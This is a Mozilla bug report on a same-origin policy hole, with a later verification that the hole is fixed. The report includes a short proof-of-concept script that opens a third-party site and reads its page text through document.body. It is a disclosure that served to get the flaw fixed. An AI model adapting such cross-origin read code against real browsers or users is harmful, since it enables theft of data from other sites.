Closed
Bug 17977
Opened 25 years ago
Closed 25 years ago
[DOGFOOD] Reading documents using document.body
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M12
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
(Whiteboard: [PDT+])
document.body seems not to be protected by "Same origin" security policy. This leads to at least reading arbitrary documents. The code is: ---------------------------------------- <SCRIPT> function f(o) { var s=''; var i; s = o.nodeValue; if ( o.childNodes ) for ( i = 0; i < o.childNodes.length; i++ ) s += f(o.childNodes[i]); return s; } a=window.open("http://www.yahoo.com"); setTimeout("alert(f(a.document.body))",10000); </SCRIPT> ----------------------------------------
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Summary: Reading documents using document.body → [Dogfood] Reading documents using document.body
Assignee | ||
Comment 1•25 years ago
|
||
Marking dogfood for analysis by PDT at jar's request.
Assignee | ||
Updated•25 years ago
|
Summary: [Dogfood] Reading documents using document.body → [DOGFOOD] Reading documents using document.body
Assignee | ||
Updated•25 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Windows NT (1999112908) Com: Javascript Error: access disallowed from scripts at http://www.nat.bg/~joro/mozilla/body1.html to documents at another domain URL: http://www.nat.bg/~joro/mozilla/body1.html LineNo: 16 Javascript Error: uncaught exception: [Exception... "Security error" code: "1000" nsresult: "0x805303e8 (NS_ERROR_DOM_SECURITY_ERR)" location: "http://www.nat.bg/~joro/mozilla/body1.html Line: 16"]
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in
before you can comment on or make changes to this bug.
Description
•